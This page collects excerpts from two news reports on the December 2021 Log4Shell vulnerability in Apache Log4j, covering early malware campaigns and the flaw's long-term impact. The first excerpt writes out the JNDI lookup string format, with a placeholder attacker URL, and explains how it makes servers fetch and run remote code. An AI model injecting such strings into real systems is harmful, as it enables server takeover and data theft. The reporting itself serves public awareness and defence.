Hackers start pushing malware in worldwide Log4Shell attacks
- December 12, 2021
- 06:07 PM
"Threat actors and researchers are scanning for and exploiting the Log4j Log4Shell vulnerability to deploy malware or find vulnerable servers. In this article, we have compiled the known payloads, scans, and attacks using the Log4j vulnerability.
Early Friday morning, an exploit was publicly released for a critical zero-day vulnerability dubbed 'Log4Shell' in the Apache Log4j Java-based logging platform used to access web server and application logs.
To exploit this vulnerability, a threat actor can change their web browser's user agent and visit a site or search for a string on a website using the format ${jndi:ldap://[attacker_URL]}. Doing so will cause the string to be appended to the web server's access logs.
When the Log4j application parses these logs and encounters the string, the bug will force the server to make a callback, or request, to the URL listed in the JNDI string. Threat actors can then use that URL to pass Base64-encoded commands or Java classes to execute on the vulnerable device.
Furthermore, just forcing the connection to the remote server is used to determine if a server is vulnerable to the Log4shell vulnerability.
While Apache quickly released Log4j 2.15.0 to resolve the vulnerability, threat actors had already started to scan for and exploit vulnerable servers to exfiltrate data, install malware, or take over the server.
As this software is used in thousands of enterprise applications and websites, there is significant concern that it will lead to widespread attacks and malware deployment.
Below we outline the known attacks currently exploiting the Log4j vulnerability.
Log4Shell used to install malware
When an easily exploitable remote code execution vulnerability is disclosed, malware distributors are usually the first to begin utilizing it.
Below we have compiled the known malware payloads exploiting Log4j from BleepingComputer web server access logs, GreyNoise data, and reports from researchers. . ."
READ MORE
Related Articles:
New ransomware now being deployed in Log4Shell attacks
Log4j: List of vulnerable products and vendor advisories
Researchers release 'vaccine' for critical Log4Shell vulnerability
CISA orders federal agencies to patch Log4Shell by December 24th
New zero-day exploit for Log4j Java library is an enterprise nightmare
______________________________________________________________________
2
Attackers will still look for creative new ways to discover and continue exploiting as many vulnerable systems as possible. The scariest part of the Log4Shell, though, is how many organizations won't even realize that they have systems at risk.
The Log4J Vulnerability Will Haunt the Internet for Years
Hundreds of millions of devices are likely affected.
"A vulnerability in the open source Apache logging library Log4j sent system administrators and security professionals scrambling over the weekend. Known as Log4Shell, the flaw is exposing some of the world's most popular applications and services to attack, and the outlook hasn't improved since the vulnerability came to light on Thursday. If anything, it's now excruciatingly clear that Log4Shell will continue to wreak havoc across the internet for years to come.
Hackers have been exploiting the bug since the beginning of the month, according to researchers from Cisco and Cloudflare. But attacks ramped up dramatically following Apache's disclosure on Thursday. So far, attackers have exploited the flaw to install cryptominers on vulnerable systems, steal system credentials, burrow deeper within compromised networks, and steal data, according to a recent report from Microsoft.
The range of impacts is so broad because of the nature of the vulnerability itself. Developers use logging frameworks to keep track of what happens in a given application. To exploit Log4Shell, an attacker only needs to get the system to log a strategically crafted string of code. From there they can load arbitrary code on the targeted server and install malware or launch other attacks. Notably, hackers can introduce the snippet in seemingly benign ways, like by sending the string in an email or setting it as an account username.
Major tech players, including Amazon Web Services, Microsoft, Cisco, Google Cloud, and IBM have all found that at least some of their services were vulnerable and have been rushing to issue fixes and advise customers about how best to proceed. The exact extent of the exposure is still coming into view, though. Less fastidious organizations or smaller developers who may lack resources and awareness will be slower to confront the Log4Shell threat.
“What is almost certain is that for years people will be discovering the long tail of new vulnerable software as they think of new places to put exploit strings,” says independent security researcher Chris Frohoff. “This will probably be showing up in assessments and penetration tests of custom enterprise apps for a long time.”
The vulnerability is already being used by a “growing set of threat actors,” US Cybersecurity and Infrastructure Security Agency director Jen Easterly said in a statement on Saturday. She added that the flaw is “one of the most serious I’ve seen in my entire career, if not the most serious” in a call with critical infrastructure operators on Monday, as first reported by CyberScoop. In that same call, a CISA official estimated that hundreds of millions of devices are likely affected.
The hard part will be tracking all of those down. . ."
https://www.wired.com/story/log4j-log4shell/
